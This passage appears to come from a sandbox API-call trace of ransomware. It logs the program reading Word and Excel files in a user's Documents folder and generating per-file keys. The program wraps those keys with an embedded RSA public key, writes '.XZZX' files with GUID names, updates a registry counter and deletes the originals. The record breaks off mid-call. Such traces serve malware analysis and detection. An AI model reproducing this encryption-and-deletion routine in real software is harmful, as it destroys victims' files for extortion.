[0037.164] SetFilePointer (in: hFile=0x448, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x192 [0037.164] WriteFile (in: hFile=0x448, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x43ce438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x43ce438*=0x5, lpOverlapped=0x0) returned 1 [0037.165] SetFilePointer (in: hFile=0x448, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x197 [0037.165] WriteFile (in: hFile=0x448, lpBuffer=0x43cf860*, nNumberOfBytesToWrite=0x16, lpNumberOfBytesWritten=0x43ce438, lpOverlapped=0x0 | out: lpBuffer=0x43cf860*, lpNumberOfBytesWritten=0x43ce438*=0x16, lpOverlapped=0x0) returned 1 [0037.165] SetFilePointer (in: hFile=0x448, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x1ad [0037.165] WriteFile (in: hFile=0x448, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x43ce438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x43ce438*=0x5, lpOverlapped=0x0) returned 1 [0037.165] SetFilePointer (in: hFile=0x448, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x1b2 [0037.165] SetErrorMode (uMode=0x1) returned 0x1 [0037.165] lstrlenA (lpString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned 271 [0037.165] OutputDebugStringW (lpOutputString="end") [0037.165] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----wX\x934", cchString=0x0, dwFlags=0x0, pbBinary=0x43cdbf4, pcbBinary=0x43cd3e0, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x43cdbf4, pcbBinary=0x43cd3e0, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0037.165] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x43cdbf4, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x43cd3dc, pcbStructInfo=0x43cd3d8 | out: pvStructInfo=0x43cd3dc, pcbStructInfo=0x43cd3d8) returned 1 [0037.165] CryptAcquireContextW (in: phProv=0x43cd3e4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x43cd3e4*=0x3ebc18) returned 1 [0037.166] CryptImportPublicKeyInfo (in: hCryptProv=0x3ebc18, dwCertEncodingType=0x1, pInfo=0x3dd2198*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x3dd21c8*, PublicKey.cbData=0x8c, PublicKey.pbData=0x3dd21d0*, PublicKey.cUnusedBits=0x0), phKey=0x43cd3ec | out: phKey=0x43cd3ec*=0x324cb8) returned 1 [0037.166] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x77200000 [0037.167] GetProcAddress (hModule=0x77200000, lpProcName="CryptEncrypt") returned 0x7722779b [0037.167] CryptEncrypt (in: hKey=0x324cb8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x43cd3f0*=0x75, dwBufLen=0x75 | out: pbData=0x0*, pdwDataLen=0x43cd3f0*=0x80) returned 1 [0037.167] CryptEncrypt (in: hKey=0x324cb8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x3ebca0*, pdwDataLen=0x43cd3e8*=0x75, dwBufLen=0x80 | out: pbData=0x3ebca0*, pdwDataLen=0x43cd3e8*=0x80) returned 1 [0037.167] WriteFile (in: hFile=0x448, lpBuffer=0x3ebca0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x43ce438, lpOverlapped=0x0 | out: lpBuffer=0x3ebca0*, lpNumberOfBytesWritten=0x43ce438*=0x80, lpOverlapped=0x0) returned 1 [0037.167] SetFilePointer (in: hFile=0x76a31282, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0037.167] WriteFile (in: hFile=0x448, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x43ce438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x43ce438*=0x5, lpOverlapped=0x0) returned 1 [0037.167] GetUserNameW (in: lpBuffer=0x43ce1f8, pcbBuffer=0x43cdfe0 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x43cdfe0) returned 1 [0037.167] wsprintfW (in: param_1=0x43cdff0, param_2="%08X" | out: param_1="E1010314") returned 8 [0037.167] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x43cdfe4 | out: phkResult=0x43cdfe4*=0x460) returned 0x0 [0037.167] RegQueryValueExW (in: hKey=0x460, lpValueName="E1010314", lpReserved=0x0, lpType=0x43cdfd8, lpData=0x43cdfec, lpcbData=0x43cdfdc*=0x4 | out: lpType=0x43cdfd8*=0x4, lpData=0x43cdfec*=0x14, lpcbData=0x43cdfdc*=0x4) returned 0x0 [0037.167] RegCloseKey (hKey=0x460) returned 0x0 [0037.167] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x43cdfe8 | out: phkResult=0x43cdfe8*=0x460) returned 0x0 [0037.168] RegSetValueExW (in: hKey=0x460, lpValueName="E1010314", Reserved=0x0, dwType=0x4, lpData=0x43cdfec*=0x15, cbData=0x4 | out: lpData=0x43cdfec*=0x15) returned 0x0 [0037.168] RegCloseKey (hKey=0x460) returned 0x0 [0037.168] VirtualFree (lpAddress=0x3eb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0037.168] VirtualFree (lpAddress=0x3ec0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0037.168] CloseHandle (hObject=0x448) returned 1 [0037.175] LoadLibraryExW (lpLibFileName="kernel32.dll", hFile=0x0, dwFlags=0x0) returned 0x76a20000 [0037.176] GetProcAddress (hModule=0x76a20000, lpProcName="DeleteFileW") returned 0x76a389b3 [0037.176] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\desktop.ini")) returned 1 [0037.177] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\desktop.ini")) returned 0 Thread: id = 112 os_tid = 0x8d4 [0037.122] lstrcpyA (in: lpString1=0x44cfc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0037.122] lstrcpyW (in: lpString1=0x44cf460, lpString2="dKWKVTxHxijfZD_dSm_.xlsx" | out: lpString1="dKWKVTxHxijfZD_dSm_.xlsx") returned="dKWKVTxHxijfZD_dSm_.xlsx" [0037.122] lstrcpyW (in: lpString1=0x44ce860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" [0037.122] SetErrorMode (uMode=0x1) returned 0x1 [0037.122] lstrcpyW (in: lpString1=0x44cf860, lpString2="dKWKVTxHxijfZD_dSm_.xlsx" | out: lpString1="dKWKVTxHxijfZD_dSm_.xlsx") returned="dKWKVTxHxijfZD_dSm_.xlsx" [0037.122] CoCreateGuid (in: pguid=0x44ce440 | out: pguid=0x44ce440*(Data1=0x60617643, Data2=0xbde8, Data3=0x4857, Data4=([0]=0x93, [1]=0x75, [2]=0x79, [3]=0xe5, [4]=0x26, [5]=0x6a, [6]=0xc8, [7]=0x61))) returned 0x0 [0037.122] wsprintfW (in: param_1=0x44cec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\dKWKVTxHxijfZD_dSm_.xlsx") returned 68 [0037.122] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x44cfee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0037.122] wsprintfW (in: param_1=0x44ce450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\4CA2A3B835A9C9D86061764339F6AE20.XZZX") returned 81 [0037.122] StrStrW (lpFirst="dKWKVTxHxijfZD_dSm_.xlsx", lpSrch="XZZX") returned 0x0 [0037.122] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\dKWKVTxHxijfZD_dSm_.xlsx", dwFileAttributes=0x20) returned 1 [0037.123] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\dKWKVTxHxijfZD_dSm_.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\dkwkvtxhxijfzd_dsm_.xlsx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x448 [0037.123] ReadFile (in: hFile=0x448, lpBuffer=0x3e1aed8, nNumberOfBytesToRead=0xaab3, lpNumberOfBytesRead=0x44ce418, lpOverlapped=0x0 | out: lpBuffer=0x3e1aed8*, lpNumberOfBytesRead=0x44ce418*=0xaab3, lpOverlapped=0x0) returned 1 [0037.123] CloseHandle (hObject=0x448) returned 1 [0037.123] VirtualAlloc (lpAddress=0x0, dwSize=0x75, flAllocationType=0x3000, flProtect=0x4) returned 0x3e50000 [0037.124] VirtualAlloc (lpAddress=0x0, dwSize=0x12c, flAllocationType=0x3000, flProtect=0x4) returned 0x3e60000 [0037.124] SetErrorMode (uMode=0x1) returned 0x1 [0037.124] lstrcpyW (in: lpString1=0x44ce358, lpString2="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" | out: lpString1="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre") returned="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" [0037.125] CryptAcquireContextW (in: phProv=0x5582af24, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0x0 | out: phProv=0x5582af24*=0x3ebb90) returned 1 [0037.127] CryptGenKey (in: hProv=0x3ebb90, Algid=0x1, dwFlags=0x4000, phKey=0x5582af28 | out: phKey=0x5582af28*=0x324ef8) returned 1 [0037.327] CryptExportKey (in: hKey=0x324ef8, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x0, pdwDataLen=0x44ce41c | out: pbData=0x0*, pdwDataLen=0x44ce41c*=0x94) returned 1 [0037.327] CryptExportKey (in: hKey=0x324ef8, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x3e60000, pdwDataLen=0x44ce41c | out: pbData=0x3e60000*, pdwDataLen=0x44ce41c*=0x94) returned 1 [0037.327] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x77200000 [0037.328] GetProcAddress (hModule=0x77200000, lpProcName="CryptReleaseContext") returned 0x7720e124 [0037.328] CryptDestroyKey (hKey=0x324ef8) returned 1 [0037.328] CryptReleaseContext (hProv=0x3ebd28, dwFlags=0x0) returned 0 [0037.328] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\4CA2A3B835A9C9D86061764339F6AE20.XZZX" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\4ca2a3b835a9c9d86061764339f6ae20.xzzx"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x458 [0037.375] WriteFile (in: hFile=0x458, lpBuffer=0x3e1aed8*, nNumberOfBytesToWrite=0xaab3, lpNumberOfBytesWritten=0x44ce438, lpOverlapped=0x0 | out: lpBuffer=0x3e1aed8*, lpNumberOfBytesWritten=0x44ce438*=0xaab3, lpOverlapped=0x0) returned 1 [0037.376] SetFilePointer (in: hFile=0x458, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xaab3 [0037.376] WriteFile (in: hFile=0x458, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x44ce438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x44ce438*=0x5, lpOverlapped=0x0) returned 1 [0037.376] SetFilePointer (in: hFile=0x458, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xaab8 [0037.376] WriteFile (in: hFile=0x458, lpBuffer=0x44cf860*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x44ce438, lpOverlapped=0x0 | out: lpBuffer=0x44cf860*, lpNumberOfBytesWritten=0x44ce438*=0x30, lpOverlapped=0x0) returned 1 [0037.376] SetFilePointer (in: hFile=0x458, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xaae8 [0037.376] WriteFile (in: hFile=0x458, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x44ce438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x44ce438*=0x5, lpOverlapped=0x0) returned 1 [0037.376] SetFilePointer (in: hFile=0x458, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xaaed [0037.376] SetErrorMode (uMode=0x1) returned 0x1 [0037.376] lstrlenA (lpString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned 271 [0037.376] OutputDebugStringW (lpOutputString="end") [0037.377] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----wXe5", cchString=0x0, dwFlags=0x0, pbBinary=0x44cdbf4, pcbBinary=0x44cd3e0, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x44cdbf4, pcbBinary=0x44cd3e0, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0037.377] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x44cdbf4, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x44cd3dc, pcbStructInfo=0x44cd3d8 | out: pvStructInfo=0x44cd3dc, pcbStructInfo=0x44cd3d8) returned 1 [0037.377] CryptAcquireContextW (in: phProv=0x44cd3e4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x44cd3e4*=0x3ebdb0) returned 1 [0037.377] CryptImportPublicKeyInfo (in: hCryptProv=0x3ebdb0, dwCertEncodingType=0x1, pInfo=0x3dd2268*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x3dd2298*, PublicKey.cbData=0x8c, PublicKey.pbData=0x3dd22a0*, PublicKey.cUnusedBits=0x0), phKey=0x44cd3ec | out: phKey=0x44cd3ec*=0x324ef8) returned 1 [0037.377] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x77200000 [0037.378] GetProcAddress (hModule=0x77200000, lpProcName="CryptEncrypt") returned 0x7722779b [0037.378] CryptEncrypt (in: hKey=0x324ef8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x44cd3f0*=0x75, dwBufLen=0x75 | out: pbData=0x0*, pdwDataLen=0x44cd3f0*=0x80) returned 1 [0037.378] CryptEncrypt (in: hKey=0x324ef8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x3ebe38*, pdwDataLen=0x44cd3e8*=0x75, dwBufLen=0x80 | out: pbData=0x3ebe38*, pdwDataLen=0x44cd3e8*=0x80) returned 1 [0037.378] WriteFile (in: hFile=0x458, lpBuffer=0x3ebe38*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x44ce438, lpOverlapped=0x0 | out: lpBuffer=0x3ebe38*, lpNumberOfBytesWritten=0x44ce438*=0x80, lpOverlapped=0x0) returned 1 [0037.378] SetFilePointer (in: hFile=0x76a31282, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0037.378] WriteFile (in: hFile=0x458, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x44ce438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x44ce438*=0x5, lpOverlapped=0x0) returned 1 [0037.378] GetUserNameW (in: lpBuffer=0x44ce1f8, pcbBuffer=0x44cdfe0 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x44cdfe0) returned 1 [0037.379] wsprintfW (in: param_1=0x44cdff0, param_2="%08X" | out: param_1="E1010314") returned 8 [0037.379] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x44cdfe4 | out: phkResult=0x44cdfe4*=0x464) returned 0x0 [0037.379] RegQueryValueExW (in: hKey=0x464, lpValueName="E1010314", lpReserved=0x0, lpType=0x44cdfd8, lpData=0x44cdfec, lpcbData=0x44cdfdc*=0x4 | out: lpType=0x44cdfd8*=0x4, lpData=0x44cdfec*=0x15, lpcbData=0x44cdfdc*=0x4) returned 0x0 [0037.379] RegCloseKey (hKey=0x464) returned 0x0 [0037.379] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x44cdfe8 | out: phkResult=0x44cdfe8*=0x464) returned 0x0 [0037.379] RegSetValueExW (in: hKey=0x464, lpValueName="E1010314", Reserved=0x0, dwType=0x4, lpData=0x44cdfec*=0x16, cbData=0x4 | out: lpData=0x44cdfec*=0x16) returned 0x0 [0037.379] RegCloseKey (hKey=0x464) returned 0x0 [0037.379] VirtualFree (lpAddress=0x3e50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0037.379] VirtualFree (lpAddress=0x3e60000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0037.380] CloseHandle (hObject=0x458) returned 1 [0037.381] LoadLibraryExW (lpLibFileName="kernel32.dll", hFile=0x0, dwFlags=0x0) returned 0x76a20000 [0037.381] GetProcAddress (hModule=0x76a20000, lpProcName="DeleteFileW") returned 0x76a389b3 [0037.381] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\dKWKVTxHxijfZD_dSm_.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\dkwkvtxhxijfzd_dsm_.xlsx")) returned 1 [0037.383] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\dKWKVTxHxijfZD_dSm_.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\dkwkvtxhxijfzd_dsm_.xlsx")) returned 0 Thread: id = 113 os_tid = 0x3a8 [0037.264] lstrcpyA (in: lpString1=0x417fc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0037.264] lstrcpyW (in: lpString1=0x417f460, lpString2="dsL8WL.docx" | out: lpString1="dsL8WL.docx") returned="dsL8WL.docx" [0037.264] lstrcpyW (in: lpString1=0x417e860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" [0037.264] SetErrorMode (uMode=0x1) returned 0x1 [0037.265] lstrcpyW (in: lpString1=0x417f860, lpString2="dsL8WL.docx" | out: lpString1="dsL8WL.docx") returned="dsL8WL.docx" [0037.265] CoCreateGuid (in: pguid=0x417e440 | out: pguid=0x417e440*(Data1=0xc413f0dc, Data2=0x4fd7, Data3=0x469f, Data4=([0]=0xa3, [1]=0x57, [2]=0x70, [3]=0x82, [4]=0x4b, [5]=0x8, [6]=0x33, [7]=0x87))) returned 0x0 [0037.265] wsprintfW (in: param_1=0x417ec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\dsL8WL.docx") returned 55 [0037.265] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x417fee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0037.265] wsprintfW (in: param_1=0x417e450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\D4132CC416066089C413F0DC1A1E44D1.XZZX") returned 81 [0037.265] StrStrW (lpFirst="dsL8WL.docx", lpSrch="XZZX") returned 0x0 [0037.265] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\dsL8WL.docx", dwFileAttributes=0x20) returned 1 [0037.265] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\dsL8WL.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\dsl8wl.docx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x458 [0037.265] ReadFile (in: hFile=0x458, lpBuffer=0x3e2ff90, nNumberOfBytesToRead=0x103a1, lpNumberOfBytesRead=0x417e418, lpOverlapped=0x0 | out: lpBuffer=0x3e2ff90*, lpNumberOfBytesRead=0x417e418*=0x103a1, lpOverlapped=0x0) returned 1 [0037.266] CloseHandle (hObject=0x458) returned 1 [0037.266] VirtualAlloc (lpAddress=0x0, dwSize=0x75, flAllocationType=0x3000, flProtect=0x4) returned 0x3eb0000 [0037.266] VirtualAlloc (lpAddress=0x0, dwSize=0x12c, flAllocationType=0x3000, flProtect=0x4) returned 0x3ec0000 [0037.267] SetErrorMode (uMode=0x1) returned 0x1 [0037.267] lstrcpyW (in: lpString1=0x417e358, lpString2="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" | out: lpString1="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre") returned="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" [0037.267] CryptAcquireContextW (in: phProv=0x5582af24, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0x0 | out: phProv=0x5582af24*=0x3ebd28) returned 1 [0037.270] CryptGenKey (in: hProv=0x3ebd28, Algid=0x1, dwFlags=0x4000, phKey=0x5582af28 | out: phKey=0x5582af28*=0x324f78) returned 1 [0037.704] CryptExportKey (in: hKey=0x324f78, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x0, pdwDataLen=0x417e41c | out: pbData=0x0*, pdwDataLen=0x417e41c*=0x94) returned 1 [0037.704] CryptExportKey (in: hKey=0x324f78, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x3ec0000, pdwDataLen=0x417e41c | out: pbData=0x3ec0000*, pdwDataLen=0x417e41c*=0x94) returned 1 [0037.704] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x77200000 [0037.705] GetProcAddress (hModule=0x77200000, lpProcName="CryptReleaseContext") returned 0x7720e124 [0037.705] CryptDestroyKey (hKey=0x324f78) returned 1 [0037.705] CryptReleaseContext (hProv=0x3e2cd40, dwFlags=0x0) returned 0 [0037.705] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\D4132CC416066089C413F0DC1A1E44D1.XZZX" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\d4132cc416066089c413f0dc1a1e44d1.xzzx"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x458 [0037.706] WriteFile (in: hFile=0x458, lpBuffer=0x3e2ff90*, nNumberOfBytesToWrite=0x103a1, lpNumberOfBytesWritten=0x417e438, 